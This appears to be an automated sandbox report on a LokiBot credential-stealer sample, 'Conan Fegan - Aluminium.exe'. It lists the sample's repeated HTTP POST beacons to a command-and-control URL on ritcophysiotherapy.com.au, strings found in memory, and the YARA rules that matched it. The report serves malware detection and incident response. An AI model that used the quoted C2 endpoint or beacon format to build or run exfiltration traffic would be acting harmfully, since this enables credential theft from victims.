                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: global trafficHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 163Connection: close
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00404ED4 recv
                  Source: unknownDNS traffic detected: queries for: www.ritcophysiotherapy.com.au
                  Source: unknownHTTP traffic detected: POST /wap121/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: www.ritcophysiotherapy.com.auAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: AD291CEContent-Length: 190Connection: close
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 22 Feb 2021 18:13:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.2.34Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.638473832.0000000005B8D000.00000004.00000001.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comionF
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.commi
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.635133696.0000000005B6B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636630818.0000000005B56000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/;
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn9
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636140982.0000000005B5E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnFk
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636508473.0000000005B58000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnO
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.636344129.0000000005B57000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cng
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.650636211.0000000005B50000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm-
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Conan Fegan - Aluminium.exe, Conan Fegan - Aluminium.exe, 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000003.634766145.0000000005B53000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.652969440.0000000005CD0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.900851249.000000000049F000.00000040.00000001.sdmpString found in binary or memory: https://www.ritcophysiotherapy.com.au/wap121/five/fre.php

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  .NET source code contains very large strings
                  Source: Conan Fegan - Aluminium.exe, frmlogin.csLong String: Length: 13656
                  Source: 0.2.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: 0.0.Conan Fegan - Aluminium.exe.960000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: 5.2.Conan Fegan - Aluminium.exe.c20000.1.unpack, frmlogin.csLong String: Length: 13656
                  Source: 5.0.Conan Fegan - Aluminium.exe.c20000.0.unpack, frmlogin.csLong String: Length: 13656
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_00969526
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_0096B3F4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_0096A47C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38DF8
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A30040
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A30D80
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38DEA
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A3C5FF
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A38417
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A32BC7
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A32BD8
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 0_2_07A34190
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_0040549C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_004029D4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C2A47C
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C29526
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: 5_2_00C2B3F4
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: String function: 0041219C appears 45 times
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeCode function: String function: 00405B6F appears 42 times
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.654833481.00000000077B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.654938639.00000000079A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLegacyPathHandling.dllN vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.650852695.00000000009C4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAsyncState.dllF vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exe, 00000005.00000002.900934959.0000000000C84000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exeBinary or memory string: OriginalFilenameCallConvCdecl.exe4 vs Conan Fegan - Aluminium.exe
                  Source: Conan Fegan - Aluminium.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3e3d4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 5.2.Conan Fegan - Aluminium.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3eccf90.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.2d63264.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                  Source: 0.2.Conan Fegan - Aluminium.exe.3dfbac0.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Conan Fegan - Aluminium.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: Conan Fegan - Aluminium.exe, frmlogin.csBase64 encoded string:
